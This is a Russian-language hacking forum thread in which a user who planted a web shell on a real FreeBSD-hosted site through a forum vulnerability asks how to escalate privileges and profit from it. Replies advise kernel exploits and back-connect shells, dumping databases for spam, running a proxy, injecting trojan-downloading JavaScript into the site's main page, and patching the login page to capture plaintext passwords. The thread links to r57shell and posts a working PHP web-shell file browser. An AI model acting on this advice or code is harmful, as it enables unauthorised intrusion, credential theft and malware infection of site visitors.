Залил на сайт шелл через уязвимость в форуме.
Дефейсить не интересно.
Можно как то поднять права выше, получить хостера ?
Что вообще можно получить с этого шела ?

вопрос: зачем залил: спортивный интерес или кровная месть???

если интерес: ну поройся там, сям, поищи инфу какую нить, залей еще чего-нить интересное, когда админ ету дырку заклеет, залезть опять, админ точно повесится...

месть? куси и кроши шоб ни кусочка не осталось, тока покоцаная главная страничка с надписью

" ЗДЕСЬ БЫЛ ВАСЯ :) "

З.Ы. тока лучше не тяни... обломают.

З.З.Ы. ну, инфа - самое наверное важное: номера, аси, пароли и прочая по@бень...

для начала глянь версию операционки, потом поищи сплойты под эту версию. Потом бекконнект тебе в руки и юзай сплойт. а вообще вот почитай

http://hackedpro.org/forum/showthread.php?t=7

uname -a выдаёт
FreeBSD voleri-a.*****.ru 6.2-PRERELEASE FreeBSD 6.2-PRERELEASE #0: Tue Oct 3 18:28:07 MSD 2006 root@voleri.*****.ru:/usr/obj/usr/src/sys/work amd64
Система я так понял FreeBSD 6.2-PRERELEASE искал на неё сплоиты но не нашёл, есть только для 6.1 и ниже.
Базы данных форума и сайта я слил, потом буду расшифровывать.
Крушить ничего не хочу, хочется что нибудь полезного с этого поиметь.
А что такое бекконнект ?

А что такое бекконнект ?
На тачке открывается порт для подключения к которому ты и конеектишся. И дальше работаеш через консоль.

Залил на сайт шелл через уязвимость в форуме.
Дефейсить не интересно.
Можно как то поднять права выше, получить хостера ?
Что вообще можно получить с этого шела ?
Ставь прокси))
Делай дамп баз! посмотри мож в них че интересное)) ну как минимум спам база уже будет!
Можеш в гланую страничку добавить Java Script который будет загружать и запускать троянца на комп жертв))

А откуда кстати можно хороший backconect слить??

в продолжение темы. А какой прокси посоветуете ставить, а то у меня таже ситуация. Нашел сервак, залил шел, базы скачал (5000 мейлов), че дальше делать не знаю, ну полазил там по остальным сайтом на этой машине и все.

в продолжение темы. А какой прокси посоветуете ставить, а то у меня та же ситуация. Нашел сервак, залил шел, базы скачал (5000 мейлов), че дальше делать не знаю, ну полазил там по остальным сайтом на этой машине и все.

если кодить умеешь - то за 5 минут к странице логининга дописывается плагин, который сохраняет пароли в открытом виде, затем проверяются эти пароли на юзерские аськи, мыла etc ))) (чтоб хеши не брутить) (и если прав на перехапись скриптов хватает)

А какой прокси посоветуете
3Proxy Статья (http://forum.antichat.ru/thread19840.html)

если кодить умеешь - то за 5 минут к странице логининга дописывается плагин, который сохраняет пароли в открытом виде.
Не подскажешь где про это можно почитать ?
Да кстати может кто нибудь поделиться r57shell 1.31 а то rst.void закрыли и нескачаешь, если есть то лучше исправленный =)

Не подскажешь где про это можно почитать ?
Да кстати может кто нибудь поделиться r57shell 1.31 а то rst.void закрыли и нескачаешь, если есть то лучше исправленный =)

http://rst.void.ru/download/r57shell.txt.gz
http://rst.void.ru/r57shell_create.php
А по мне лучше: http://www.security-teams.net/index.php?showtopic=3429

вот держи небольшой проводник:

<?php
if(!isset($_GET['dir']))
$_GET['dir']='.';
if(is_dir($_GET['dir']))
{
print "<body bgcolor=d0d0d0><table><tr><td align=center><b>[имя]</b></td><td align=center><b>[права]</b></td><td align=center><b>[размер]</b></td><tr>";
$dira=opendir($_GET['dir']);
while (false!==(($file = readdir($dira))))
{
if($file=='.')
continue;
$fs="-";
if(is_dir($file))////есле папка/////
echo "<tr><td><a href=$SCRIPT_NAME?dir=".$_GET['dir']."/$file><font color=660000>$file</font></a></td><td align=center><br>";
else
{
echo "<tr><td><a href=$SCRIPT_NAME?dir=".$_GET['dir']."/$file><font color=006600>$file</font></a></td><td align=center>-<br>";
$fs=filesize($_GET['dir']."/$file");
if($fs!=0)
{
$ost=$fs%1024;
$fs-=$ost;
if($fs!=0)
$fs/=1024;
else $fs=1;
}
}
if(is_readable($file)) echo "r"; else echo "-";
if(is_writable($file)) echo "w"; else echo "-";
if(is_executable($file)) echo "x"; else echo "-";
echo "</td><td align=center>$fs</td></tr>";
}
}
else
{
print "<pre>";
foreach(file($_GET['dir']) as $val)
echo htmlspecialchars($val);
print "</pre>";
}
?>

2GrAmOzEkA вот и ответ Permission denied!